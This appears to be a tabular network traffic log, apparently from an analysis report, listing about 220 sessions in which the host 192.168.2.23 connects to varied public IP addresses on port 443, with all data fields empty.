                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16864192.168.2.2350166142.15.39.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16865192.168.2.233604295.213.39.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16866192.168.2.2356294100.241.254.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16867192.168.2.234740618.167.148.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16868192.168.2.234000458.58.240.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16869192.168.2.2337862166.129.243.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16870192.168.2.2359770146.32.29.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16871192.168.2.2335002163.143.173.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16872192.168.2.235492043.149.80.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16873192.168.2.235189018.141.112.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16874192.168.2.234491264.150.94.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16875192.168.2.234739078.253.29.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16876192.168.2.233517658.18.206.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16877192.168.2.235857252.62.100.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16878192.168.2.2334524197.218.83.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16879192.168.2.2357370120.213.165.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16880192.168.2.2337198121.239.153.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16881192.168.2.2348920204.168.64.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16882192.168.2.234567218.241.227.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16883192.168.2.2358078101.72.36.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16884192.168.2.234356235.161.237.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16885192.168.2.2346084148.80.175.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16886192.168.2.2353366130.254.243.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16887192.168.2.23482589.92.82.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16888192.168.2.235835096.199.22.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16889192.168.2.234538080.83.113.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16890192.168.2.2336398101.149.81.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16891192.168.2.2340984198.114.181.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16892192.168.2.234531853.99.194.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16893192.168.2.23400942.84.249.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16894192.168.2.233809453.227.137.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16895192.168.2.2353098133.183.243.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16896192.168.2.2356188139.189.158.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16897192.168.2.2344050106.238.170.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16898192.168.2.235459424.43.167.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16899192.168.2.2345248208.105.126.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16900192.168.2.2346762200.36.202.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16901192.168.2.235706450.37.153.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16902192.168.2.2336204178.200.25.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16903192.168.2.2358178107.0.158.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16904192.168.2.2349628129.169.166.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16905192.168.2.2333598105.55.230.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16906192.168.2.2356232207.4.206.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16907192.168.2.2338114210.168.194.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16908192.168.2.2345378221.52.91.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16909192.168.2.2348706173.178.177.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16910192.168.2.233598258.36.100.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16911192.168.2.233419240.103.155.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16912192.168.2.234530223.185.92.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16913192.168.2.235334693.159.132.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16914192.168.2.2335452115.208.38.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16915192.168.2.235194647.57.104.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16916192.168.2.2335436108.50.72.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16917192.168.2.233872451.147.158.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16918192.168.2.233278896.61.48.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16919192.168.2.2344092100.156.57.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16920192.168.2.234203276.45.105.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16921192.168.2.2338278106.114.241.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16922192.168.2.233709693.96.208.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16923192.168.2.234900081.137.162.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16924192.168.2.234910697.172.83.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16925192.168.2.234715664.35.59.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16926192.168.2.2345628177.217.57.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16927192.168.2.2335120200.214.69.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16928192.168.2.2337422160.94.181.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16929192.168.2.2349666125.255.171.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16930192.168.2.23521284.184.3.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16931192.168.2.235236285.197.0.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16932192.168.2.235316845.37.52.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16933192.168.2.2339644184.50.49.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16934192.168.2.2353334210.204.107.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16935192.168.2.23370864.132.92.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16936192.168.2.235208866.15.110.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16937192.168.2.234959640.150.2.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16938192.168.2.235108073.112.91.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16939192.168.2.2337636138.142.160.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16940192.168.2.2345096139.70.40.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16941192.168.2.2359954129.165.6.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16942192.168.2.2356608213.83.174.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16943192.168.2.234477224.148.174.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16944192.168.2.233955670.220.129.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16945192.168.2.23363045.175.234.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16946192.168.2.2346942145.72.109.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16947192.168.2.2344080168.172.53.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16948192.168.2.2342712101.203.139.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16949192.168.2.2343522135.70.78.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16950192.168.2.2339756191.53.159.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16951192.168.2.2357116142.183.67.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16952192.168.2.23333161.96.103.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16953192.168.2.233733425.54.23.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16954192.168.2.235719667.117.177.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16955192.168.2.235236040.45.151.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16956192.168.2.2349910205.47.57.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16957192.168.2.2343154172.242.25.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16958192.168.2.23586729.106.87.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16959192.168.2.2351804107.182.87.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16960192.168.2.2356972207.225.221.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16961192.168.2.2360476212.184.144.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16962192.168.2.2354954103.132.228.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16963192.168.2.234325646.28.50.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16964192.168.2.2360600172.146.197.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16965192.168.2.234115269.230.93.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16966192.168.2.2358340148.144.241.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16967192.168.2.235534612.4.213.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16968192.168.2.2339074184.206.238.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16969192.168.2.2357266137.148.19.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16970192.168.2.2333660175.94.220.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16971192.168.2.2354804183.19.26.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16972192.168.2.234719434.247.109.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16973192.168.2.233639235.103.71.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16974192.168.2.2336128188.219.84.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16975192.168.2.235651050.224.54.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16976192.168.2.234079280.140.134.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16977192.168.2.2356058177.146.183.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16978192.168.2.2353036217.177.153.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16979192.168.2.233584865.140.70.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16980192.168.2.2358506169.75.135.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16981192.168.2.2355486188.36.67.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16982192.168.2.2340402139.51.226.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16983192.168.2.2334122115.248.91.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16984192.168.2.234984252.71.172.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16985192.168.2.2335350116.156.151.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16986192.168.2.234995623.202.94.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16987192.168.2.235864682.207.138.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16988192.168.2.2336648206.32.98.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16989192.168.2.2360152136.226.148.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16990192.168.2.2348772110.142.46.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16991192.168.2.2358452209.244.62.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16992192.168.2.2337908179.80.47.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16993192.168.2.2335896178.75.241.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16994192.168.2.2334548193.231.145.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16995192.168.2.234703867.220.192.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16996192.168.2.233348085.109.35.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16997192.168.2.2357092116.2.224.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16998192.168.2.2333832150.118.46.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16999192.168.2.2343758210.65.188.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17000192.168.2.233802494.183.193.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17001192.168.2.2353182206.202.25.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17002192.168.2.2339960188.127.28.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17003192.168.2.2355750170.0.219.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17004192.168.2.2341502117.47.129.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17005192.168.2.2342470206.201.27.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17006192.168.2.2335982142.136.10.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17007192.168.2.2332816109.87.122.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17008192.168.2.233550852.239.75.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17009192.168.2.234479466.51.41.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17010192.168.2.2342074125.119.150.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17011192.168.2.235065257.5.226.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17012192.168.2.234547013.192.141.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17013192.168.2.234068447.126.131.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17014192.168.2.2358984122.176.55.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17015192.168.2.233572285.247.128.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17016192.168.2.235391236.237.250.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17017192.168.2.2345344167.14.123.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17018192.168.2.2346444213.228.74.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17019192.168.2.2343998146.184.214.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17020192.168.2.235866068.68.239.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17021192.168.2.2352406124.164.141.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17022192.168.2.2360344156.72.251.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17023192.168.2.2343202124.99.244.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17024192.168.2.2357562114.139.196.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17025192.168.2.235135813.21.94.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17026192.168.2.2352316162.53.106.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17027192.168.2.2345784170.134.46.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17028192.168.2.2360606191.123.188.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17029192.168.2.234720066.29.16.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17030192.168.2.2335332178.52.245.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17031192.168.2.2359726118.216.232.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17032192.168.2.2348040103.72.209.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17033192.168.2.234579234.128.122.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17034192.168.2.233372681.99.224.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17035192.168.2.234317419.23.195.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17036192.168.2.2337644116.252.31.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17037192.168.2.2346492207.81.86.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17038192.168.2.235014645.158.130.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17039192.168.2.2350516150.180.230.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17040192.168.2.234633083.240.22.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17041192.168.2.233883647.131.29.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17042192.168.2.2358222210.126.161.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17043192.168.2.2350716156.247.160.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17044192.168.2.2333598126.1.118.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17045192.168.2.2343426148.244.184.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17046192.168.2.2355476146.1.249.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17047192.168.2.2348206219.251.92.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17048192.168.2.2348780191.50.242.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17049192.168.2.2345626170.247.196.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17050192.168.2.234987860.225.27.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17051192.168.2.235423857.30.145.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17052192.168.2.2336650169.27.222.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17053192.168.2.2354658204.248.237.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17054192.168.2.2356800219.91.157.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17055192.168.2.2353778166.52.149.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17056192.168.2.234911431.62.233.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17057192.168.2.235173812.130.218.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17058192.168.2.2346854208.179.248.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17059192.168.2.233870253.211.127.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17060192.168.2.235065224.129.187.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17061192.168.2.234867424.214.89.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17062192.168.2.2356198155.91.147.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17063192.168.2.2360428154.28.128.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17064192.168.2.233566892.118.197.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17065192.168.2.2349786106.244.7.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17066192.168.2.2337070104.146.221.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17067192.168.2.2342886118.160.25.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17068192.168.2.2341342118.169.35.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17069192.168.2.234613298.134.217.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17070192.168.2.2346754223.97.126.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17071192.168.2.233784860.31.0.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17072192.168.2.2339572155.86.19.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17073192.168.2.233505064.193.150.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17074192.168.2.2351996174.8.66.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17075192.168.2.2341720207.112.118.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17076192.168.2.2354402190.218.88.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17077192.168.2.233638491.204.33.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17078192.168.2.2355918167.104.152.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17079192.168.2.2360944119.85.100.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17080192.168.2.2356218140.122.18.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17081192.168.2.2351066192.176.157.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17082192.168.2.235199851.176.220.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17083192.168.2.235183297.224.83.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17084192.168.2.234547412.5.247.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17085192.168.2.2345250116.226.6.143443
